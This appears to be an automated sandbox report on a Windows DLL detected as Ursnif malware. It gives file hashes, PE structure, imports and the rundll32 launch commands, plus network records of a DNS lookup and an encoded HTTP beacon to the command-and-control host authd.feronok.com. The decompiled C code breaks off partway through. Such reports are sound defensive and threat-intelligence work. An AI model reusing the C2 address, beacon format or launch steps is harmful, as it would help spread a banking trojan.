            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
            Category:downloaded
            Size (bytes):6495
            Entropy (8bit):3.8998802417135856
            Encrypted:false
            SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
            MD5:F65C729DC2D457B7A1093813F1253192
            SHA1:5006C9B50108CF582BE308411B157574E5A893FC
            SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
            SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
            Malicious:false
            IE Cache URL:res://ieframe.dll/http_404.htm
            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):4113
            Entropy (8bit):7.9370830126943375
            Encrypted:false
            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
            MD5:5565250FCC163AA3A79F0B746416CE69
            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
            Malicious:false
            IE Cache URL:res://ieframe.dll/info_48.png
            Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):89
            Entropy (8bit):4.357175050784355
            Encrypted:false
            SSDEEP:3:oVXUbUvXkIi8JOGXnEbUvXkINLun:o9UwvXkBqEwvXkB
            MD5:178A01ED015C601590BBEC374F63BA4E
            SHA1:60027051467C6F595B05EE96B3F462A5347A1386
            SHA-256:008E01001F033E85A43FB4222C9D49A536730F53E20CA5B6000FF2208C7EB11C
            SHA-512:18190A74EFB6054F400B89B40F692A27D1D2367631EE8BA6043A6A1D7B306EDF6F47F8EC16E9A96C278885F4EF08487FAB28323A86FF5A06857BF93034C91E7A
            Malicious:false
            Preview: [2021/06/10 22:50:53.017] Latest deploy version: ..[2021/06/10 22:50:53.017] 11.211.2 ..
            C:\Users\user\AppData\Local\Temp\~DF00D3A9B95DF089AC.TMP
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:data
            Category:dropped
            Size (bytes):12933
            Entropy (8bit):0.4112137916224424
            Encrypted:false
            SSDEEP:24:c9lLh9lLh9lIn9lIn9lo0/VF9lo0/P9lW0/b/l/cX/m/l/cp/k/o:kBqoI0I020zNkXuNkpMA
            MD5:05B04A30B7A55791319C4F71771CF16A
            SHA1:2C6404B854340AB4675377DA01707CD122A8B0CF
            SHA-256:589607C9B026909DF546D1EC625408F36A64662A30971317540738E6FF09F154
            SHA-512:7822A4FB8477CA20F1F15787DAB449BEBE39D8C97E1A855008A9FF79386906CFE6195165750F11AE7C79FC0A54ECDCF47AC8EE106E4E8898EBB09F935DAD0353
            Malicious:false
            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\~DF80E1CCC67DA5CD93.TMP
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:data
            Category:dropped
            Size (bytes):40169
            Entropy (8bit):0.6776367657920739
            Encrypted:false
            SSDEEP:192:kBqoxKAuqR+eYSbIZL7fj4rL7fj48L7fj4p:kBqoxKAuqR+eYSbIZLj6LjFLjm
            MD5:BB6D7F6068DA37F8EAC557E8224E9DA4
            SHA1:FB0E3897C467217EF4BCD46E8E22723E28A734C9
            SHA-256:2E68651AAB4451D174A526B8DC3C253810F8DBF4848C0AECBAAF4E167E84D035
            SHA-512:A5D8DF746DFABA3F048E3A63EA10773395670DBAEDFEF3E49E6684ED73374C55E0B6670D39D8635CBE97E5DE606E3D8307854624D3E3542999E49FA732EF6946
            Malicious:false
            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.674513513570937
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:SecuriteInfo.com..7135.dll
            File size:886272
            MD5:5ba7ac7fa4f9e831679832b6cc22aee8
            SHA1:813df24ac22c2666b28bc3e7fb9bd1eef2a7f395
            SHA256:d2c19ac3eace29239bf919c442556abf782da5953325ee6b2626482fbf442f29
            SHA512:a345b0749d5745640fd7908cdb142960da22ac6029bafddc0666d11eb5033756c3cfde84d2fb94dcbf418df40d2ce49ec4a18b919714402b7045b96e619a27cd
            SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U.....><U.....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U.....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U........

            File Icon

            Icon Hash:74f0e4ecccdce0e4

            Static PE Info

            General

            Entrypoint:0x105cab1
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x1000000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x538835D4 [Fri May 30 07:40:04 2014 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:1bcf1a17040e578ef3e6fe0888b5a0a4

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007FD318806407h
            call 00007FD31880F0BFh
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007FD31880640Ch
            add esp, 0Ch
            pop ebp
            retn 000Ch
            push 0000000Ch
            push 010D37B8h
            call 00007FD31880A895h
            xor eax, eax
            inc eax
            mov esi, dword ptr [ebp+0Ch]
            test esi, esi
            jne 00007FD31880640Eh
            cmp dword ptr [010D5608h], esi
            je 00007FD3188064EAh
            and dword ptr [ebp-04h], 00000000h
            cmp esi, 01h
            je 00007FD318806407h
            cmp esi, 02h
            jne 00007FD318806437h
            mov ecx, dword ptr [010028F0h]
            test ecx, ecx
            je 00007FD31880640Eh
            push dword ptr [ebp+10h]
            push esi
            push dword ptr [ebp+08h]
            call ecx
            mov dword ptr [ebp-1Ch], eax
            test eax, eax
            je 00007FD3188064B7h
            push dword ptr [ebp+10h]
            push esi
            push dword ptr [ebp+08h]
            call 00007FD318806216h
            mov dword ptr [ebp-1Ch], eax
            test eax, eax
            je 00007FD3188064A0h
            mov ebx, dword ptr [ebp+10h]
            push ebx
            push esi
            push dword ptr [ebp+08h]
            call 00007FD31882841Fh
            mov edi, eax
            mov dword ptr [ebp-1Ch], edi
            cmp esi, 01h
            jne 00007FD31880642Ah
            test edi, edi
            jne 00007FD318806426h
            push ebx
            push eax
            push dword ptr [ebp+08h]
            call 00007FD318828407h
            push ebx
            push edi
            push dword ptr [ebp+08h]
            call 00007FD3188061DCh
            mov eax, dword ptr [010028F0h]
            test eax, eax
            je 00007FD318806409h
            push ebx
            push edi
            push dword ptr [ebp+08h]
            call eax

            Rich Headers

            Programming Language:
            • [EXP] VS2013 build 21005
            • [IMP] VS2013 build 21005
            • [ C ] VS2013 build 21005
            • [C++] VS2013 build 21005
            • [LNK] VS2013 build 21005
            • [ASM] VS2013 build 21005
            • [RES] VS2013 build 21005

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0xd3e200x5b.text
            IMAGE_DIRECTORY_ENTRY_IMPORT0xec1e80x50.idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xed0000x518.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000x270c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x10500x38.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x59ae00x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xec0000x1e8.idata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xd2e7b0xd3000False0.615229746742data5.64357184369IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0xd40000x1782c0x1600False0.347478693182data3.91320304109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .idata0xec0000xd0e0xe00False0.430803571429data5.29299062625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0xed0000x5180x600False0.381510416667data2.93540035637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xee0000x270c0x2800False0.7810546875data6.65386529971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_STRING0xed3c00x156dataEnglishUnited States
            RT_VERSION0xed0a00x320dataEnglishUnited States

            Imports

            DLLImport
            KERNEL32.dllGetSystemTime, GetTempPathA, GetVersionExA, GetCurrentDirectoryA, VirtualProtect, FindFirstChangeNotificationA, GetModuleHandleA, LockResource, GetEnvironmentVariableA, GetVolumeInformationA, OpenProcess, GetDateFormatA, QueryPerformanceCounter, FindResourceA, CreateFileA, EncodePointer, DecodePointer, GetCommandLineA, GetCurrentThreadId, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetLastError, SetLastError, GetCurrentThread, MultiByteToWideChar, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, WideCharToMultiByte, HeapSize, HeapFree, HeapAlloc, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, FatalAppExitA, GetStringTypeW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, WriteFile, GetModuleFileNameW, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryExW, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, OutputDebugStringW, CloseHandle, SetStdHandle, WriteConsoleW, CreateFileW
            ADVAPI32.dllRegisterServiceCtrlHandlerA, RegOpenKeyExA, LookupPrivilegeValueA, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateServiceA, RegQueryValueExA, RegSetValueExA, GetTokenInformation, RegCloseKey, AdjustTokenPrivileges, RegEnumKeyA, ControlService, FreeSid, SetServiceStatus, CloseServiceHandle, OpenProcessToken, StartServiceCtrlDispatcherA, DeleteService, SetEntriesInAclA, AllocateAndInitializeSid
            COMCTL32.dllDestroyPropertySheetPage, ImageList_SetOverlayImage, ImageList_Destroy, ImageList_Add, CreateToolbarEx, PropertySheetA

            Exports

            NameOrdinalAddress
            Paragraphbell10x107f020
            Sharptwo20x107e9f0

            Version Infos

            DescriptionData
            LegalCopyright Too far Corporation. All rights reserved
            InternalNameCaptain apple
            FileVersion0.3.8.218 Couldbaby
            CompanyNameToo far Corporation
            ProductNameToo far Feelsaw
            ProductVersion0.3.8.218
            FileDescriptionToo far Feelsaw
            OriginalFilenameSon.dll
            Translation0x0409 0x04b0

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jun 10, 2021 22:50:53.780543089 CEST4974880192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:53.781248093 CEST4974980192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:53.824312925 CEST8049748185.233.80.31192.168.2.3
            Jun 10, 2021 22:50:53.824376106 CEST8049749185.233.80.31192.168.2.3
            Jun 10, 2021 22:50:53.824549913 CEST4974880192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:53.824747086 CEST4974980192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:53.826638937 CEST4974880192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:53.914755106 CEST8049748185.233.80.31192.168.2.3
            Jun 10, 2021 22:50:54.366725922 CEST8049748185.233.80.31192.168.2.3
            Jun 10, 2021 22:50:54.366909027 CEST4974880192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:54.368772030 CEST4974880192.168.2.3185.233.80.31
            Jun 10, 2021 22:50:54.411453009 CEST8049748185.233.80.31192.168.2.3
            Jun 10, 2021 22:50:56.019642115 CEST4974980192.168.2.3185.233.80.31

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jun 10, 2021 22:48:53.817890882 CEST53601008.8.8.8192.168.2.3
            Jun 10, 2021 22:48:54.483824015 CEST5319553192.168.2.38.8.8.8
            Jun 10, 2021 22:48:54.544796944 CEST53531958.8.8.8192.168.2.3
            Jun 10, 2021 22:48:55.423032045 CEST5014153192.168.2.38.8.8.8
            Jun 10, 2021 22:48:55.473484039 CEST53501418.8.8.8192.168.2.3
            Jun 10, 2021 22:48:56.358875036 CEST5302353192.168.2.38.8.8.8
            Jun 10, 2021 22:48:56.409626007 CEST53530238.8.8.8192.168.2.3
            Jun 10, 2021 22:48:57.242597103 CEST4956353192.168.2.38.8.8.8
            Jun 10, 2021 22:48:57.296063900 CEST53495638.8.8.8192.168.2.3
            Jun 10, 2021 22:48:58.168931007 CEST5135253192.168.2.38.8.8.8
            Jun 10, 2021 22:48:58.219233036 CEST53513528.8.8.8192.168.2.3
            Jun 10, 2021 22:48:59.328725100 CEST5934953192.168.2.38.8.8.8
            Jun 10, 2021 22:48:59.378864050 CEST53593498.8.8.8192.168.2.3
            Jun 10, 2021 22:49:00.218533039 CEST5708453192.168.2.38.8.8.8
            Jun 10, 2021 22:49:00.268677950 CEST53570848.8.8.8192.168.2.3
            Jun 10, 2021 22:49:01.448626995 CEST5882353192.168.2.38.8.8.8
            Jun 10, 2021 22:49:01.498785973 CEST53588238.8.8.8192.168.2.3
            Jun 10, 2021 22:49:42.156111002 CEST5756853192.168.2.38.8.8.8
            Jun 10, 2021 22:49:42.245258093 CEST53575688.8.8.8192.168.2.3
            Jun 10, 2021 22:49:51.908005953 CEST5054053192.168.2.38.8.8.8
            Jun 10, 2021 22:49:51.971951962 CEST53505408.8.8.8192.168.2.3
            Jun 10, 2021 22:49:53.067883968 CEST5436653192.168.2.38.8.8.8
            Jun 10, 2021 22:49:53.137187004 CEST53543668.8.8.8192.168.2.3
            Jun 10, 2021 22:50:05.169744968 CEST5303453192.168.2.38.8.8.8
            Jun 10, 2021 22:50:05.254148006 CEST53530348.8.8.8192.168.2.3
            Jun 10, 2021 22:50:08.353154898 CEST5776253192.168.2.38.8.8.8
            Jun 10, 2021 22:50:08.421194077 CEST53577628.8.8.8192.168.2.3
            Jun 10, 2021 22:50:27.186853886 CEST5543553192.168.2.38.8.8.8
            Jun 10, 2021 22:50:27.253873110 CEST53554358.8.8.8192.168.2.3
            Jun 10, 2021 22:50:44.954138041 CEST5071353192.168.2.38.8.8.8
            Jun 10, 2021 22:50:45.027595043 CEST53507138.8.8.8192.168.2.3
            Jun 10, 2021 22:50:48.981637001 CEST5613253192.168.2.38.8.8.8
            Jun 10, 2021 22:50:49.042764902 CEST53561328.8.8.8192.168.2.3
            Jun 10, 2021 22:50:52.026371956 CEST5898753192.168.2.38.8.8.8
            Jun 10, 2021 22:50:52.089713097 CEST53589878.8.8.8192.168.2.3
            Jun 10, 2021 22:50:53.411917925 CEST5657953192.168.2.38.8.8.8
            Jun 10, 2021 22:50:53.769078016 CEST53565798.8.8.8192.168.2.3
            Jun 10, 2021 22:50:58.710943937 CEST6063353192.168.2.38.8.8.8
            Jun 10, 2021 22:50:58.782740116 CEST53606338.8.8.8192.168.2.3
            Jun 10, 2021 22:50:59.185627937 CEST6129253192.168.2.38.8.8.8
            Jun 10, 2021 22:50:59.262943983 CEST53612928.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Jun 10, 2021 22:50:53.411917925 CEST192.168.2.38.8.8.80x6f8cStandard query (0)authd.feronok.comA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Jun 10, 2021 22:50:05.254148006 CEST8.8.8.8192.168.2.30xc900No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
            Jun 10, 2021 22:50:53.769078016 CEST8.8.8.8192.168.2.30x6f8cNo error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • authd.feronok.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.349748185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
            TimestampkBytes transferredDirectionData
            Jun 10, 2021 22:50:53.826638937 CEST4316OUTGET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1
            Accept: text/html, application/xhtml+xml, image/jxr, */*
            Accept-Language: en-US
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Accept-Encoding: gzip, deflate
            Host: authd.feronok.com
            Connection: Keep-Alive
            Jun 10, 2021 22:50:54.366725922 CEST4317INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 10 Jun 2021 20:50:54 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:22:49:00
            Start date:10/06/2021
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll'
            Imagebase:0x830000
            File size:116736 bytes
            MD5 hash:542795ADF7CC08EFCF675D65310596E8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:00
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Imagebase:0xbd0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:01
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:49:01
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:22:49:05
            Start date:10/06/2021
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
            Imagebase:0x220000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:50:51
            Start date:10/06/2021
            Path:C:\Program Files\internet explorer\iexplore.exe
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Imagebase:0x7ff7dea60000
            File size:823560 bytes
            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:22:50:52
            Start date:10/06/2021
            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
            Imagebase:0x8e0000
            File size:822536 bytes
            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Code Analysis

            Reset < >

              Executed Functions

              C-Code - Quality: 80%
              			E6E1C1C7D(intOrPtr _a4) {
              				char _v28;
              				struct _SYSTEMTIME _v44;
              				char _v48;
              				long _v52;
              				long _v56;
              				void* __edi;
              				long _t21;
              				int _t23;
              				long _t26;
              				long _t27;
              				long _t31;
              				intOrPtr _t39;
              				intOrPtr _t44;
              				signed int _t45;
              				void* _t50;
              				signed int _t54;
              				void* _t56;
              				intOrPtr* _t57;
              
              				_t21 = E6E1C1F10();
              				_v52 = _t21;
              				if(_t21 != 0) {
              					L18:
              					return _t21;
              				} else {
              					goto L1;
              				}
              				do {
              					L1:
              					GetSystemTime( &_v44);
              					_t23 = SwitchToThread();
              					asm("cdq");
              					_t45 = 9;
